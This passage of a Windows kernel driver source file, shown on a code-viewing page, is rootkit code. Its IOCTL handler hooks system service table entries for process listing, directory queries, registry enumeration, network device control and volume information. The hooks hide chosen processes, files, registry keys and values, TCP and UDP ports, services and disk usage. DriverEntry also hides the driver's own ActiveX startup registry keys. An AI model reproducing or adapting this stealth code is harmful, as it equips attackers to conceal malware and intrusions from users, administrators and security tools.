📄 driver.c
字号:
//DbgPrint("buf: %ws", buf);
break;
case CODEMSG(PROCESS_CODE):
if( !ZwQuerySystemInformationHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwQuerySystemInformationAddress =(ZWQUERYSYSTEMINFORMATION)
(SYSTEMSERVICE(ZwQuerySystemInformation));
__asm cli
HOOK_SYSCALL( ZwQuerySystemInformation,
ZwQuerySystemInformationHook,
ZwQuerySystemInformationAddress );
__asm sti
ZwQuerySystemInformationHooked = TRUE;
}
AddObjectToHide( ProcessToHide, &NbProcessToHide, buf, &(Irp->IoStatus.Status));
break;
case CODEMSG(FILE_CODE):
if( !ZwQueryDirectoryFileHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwQueryDirectoryFileAddress = (ZWQUERYDIRECTORYFILE)
(SYSTEMSERVICE(ZwQueryDirectoryFile));
__asm cli
HOOK_SYSCALL( ZwQueryDirectoryFile,
ZwQueryDirectoryFileHook,
ZwQueryDirectoryFileAddress );
__asm sti
ZwQueryDirectoryFileHooked = TRUE;
}
AddObjectToHide( FileToHide, &NbFileToHide, buf, &(Irp->IoStatus.Status));
break;
case CODEMSG(REGKEY_CODE):
if( !ZwEnumerateKeyHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwEnumerateKeyAddress = (ZWENUMERATEKEY)(SYSTEMSERVICE(ZwEnumerateKey));
__asm cli
HOOK_SYSCALL( ZwEnumerateKey,
ZwEnumerateKeyHook,
ZwEnumerateKeyAddress );
__asm sti
ZwEnumerateKeyHooked = TRUE;
}
AddObjectToHide( RegKeyToHide, &NbRegKeyToHide, buf, &(Irp->IoStatus.Status));
break;
case CODEMSG(REGVALUE_CODE):
if( !ZwEnumerateValueKeyHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwEnumerateValueKeyAddress = (ZWENUMERATEVALUEKEY)
(SYSTEMSERVICE(ZwEnumerateValueKey));
__asm cli
HOOK_SYSCALL( ZwEnumerateValueKey,
ZwEnumerateValueKeyHook,
ZwEnumerateValueKeyAddress );
__asm sti
ZwEnumerateValueKeyHooked = TRUE;
}
AddObjectToHide( RegValueToHide, &NbRegValueToHide, buf, &(Irp->IoStatus.Status));
break;
case CODEMSG(TCP_PORT_CODE):
if( !ZwDeviceIoControlFileHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwDeviceIoControlFileAddress = (ZWDEVICEIOCONTROLFILE)
(SYSTEMSERVICE(ZwDeviceIoControlFile));
__asm cli
HOOK_SYSCALL( ZwDeviceIoControlFile,
ZwDeviceIoControlFileHook,
ZwDeviceIoControlFileAddress );
__asm sti
ZwDeviceIoControlFileHooked = TRUE;
}
port = (PUSHORT)buf;
for(i=0; i<NbTcpPortToHide; i++)
if( *port == TcpPortToHide[i] )
// port already hidden
hidden = TRUE;
if( !hidden && NbTcpPortToHide < 1024) {
TcpPortToHide[ NbTcpPortToHide ] = *port;
NbTcpPortToHide++;
}
break;
case CODEMSG(UDP_PORT_CODE):
if( !ZwDeviceIoControlFileHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwDeviceIoControlFileAddress = (ZWDEVICEIOCONTROLFILE)
(SYSTEMSERVICE(ZwDeviceIoControlFile));
__asm cli
HOOK_SYSCALL( ZwDeviceIoControlFile,
ZwDeviceIoControlFileHook,
ZwDeviceIoControlFileAddress );
__asm sti
ZwDeviceIoControlFileHooked = TRUE;
}
port = (PUSHORT)buf;
for(i=0; i<NbUdpPortToHide; i++)
if( *port == UdpPortToHide[i] )
hidden = TRUE;
if( !hidden && NbUdpPortToHide < 1024) {
UdpPortToHide[ NbUdpPortToHide ] = *port;
NbUdpPortToHide++;
}
break;
case CODEMSG(SERVICE_CODE):
Irp->IoStatus.Status = HideFromSCManager( buf );
break;
case CODEMSG(DISK_SPACE_CODE):
if( !ZwQueryVolumeInformationFileHooked ) {
if( !MDLinit ) {
if( !NT_SUCCESS(initMDL()) ) {
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
break;
}
}
ZwQueryVolumeInformationFileAddress = (ZWQUERYVOLUMEINFORMATIONFILE)
(SYSTEMSERVICE(ZwQueryVolumeInformationFile));
__asm cli
HOOK_SYSCALL( ZwQueryVolumeInformationFile,
ZwQueryVolumeInformationFileHook,
ZwQueryVolumeInformationFileAddress );
__asm sti
ZwQueryVolumeInformationFileHooked = TRUE;
}
break;
default:
Irp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
}
// the .exe's DeviceIOControl blocks until we exec the IoCompleteRequest
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
UNICODE_STRING DeviceName;
UNICODE_STRING DosDeviceName;
NTSTATUS status;
//DbgPrint("Driver loaded.");
DriverObject->DriverUnload = Unload;
// init strings
RtlInitUnicodeString(&DeviceName, DEVICE);
RtlInitUnicodeString(&DosDeviceName, DOSDEVICE);
// to communicate with usermode, we need a device
status = IoCreateDevice(
DriverObject, // ptr to caller object
0, // extension device allocated byte number
&DeviceName, // device name
FILE_DEVICE_UNKNOWN,
0, // no special caracteristics
FALSE, // we can open many handles in same time
&DriverDeviceObject); // [OUT] ptr to the created object
if ( !NT_SUCCESS(status) )
return STATUS_NO_SUCH_DEVICE;
// we also need a symbolic link
status = IoCreateSymbolicLink(&DosDeviceName,&DeviceName);
if( !NT_SUCCESS(status) ) {
IoDeleteDevice( DriverDeviceObject );
//DbgPrint("Failed to create symbolic link");
return STATUS_NO_SUCH_DEVICE;
}
// handle IRPs :)
DriverObject->MajorFunction[IRP_MJ_CREATE] = IODispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = IODispatch;
DriverObject->MajorFunction[IRP_MJ_READ] = IODispatch;
DriverObject->MajorFunction[IRP_MJ_WRITE] = IODispatch;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = IOManager;
// hide our ActiveX startup values
AddObjectToHide( RegKeyToHide, &NbRegKeyToHide, L"{232f4e3f2-bab8-11d0-97b9-00c04f98bcb9}", &status);
AddObjectToHide( RegKeyToHide, &NbRegKeyToHide, L"{256dc5e0e-7c46-11d3-b5bf-0000f8695621}", &status);
return STATUS_SUCCESS;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -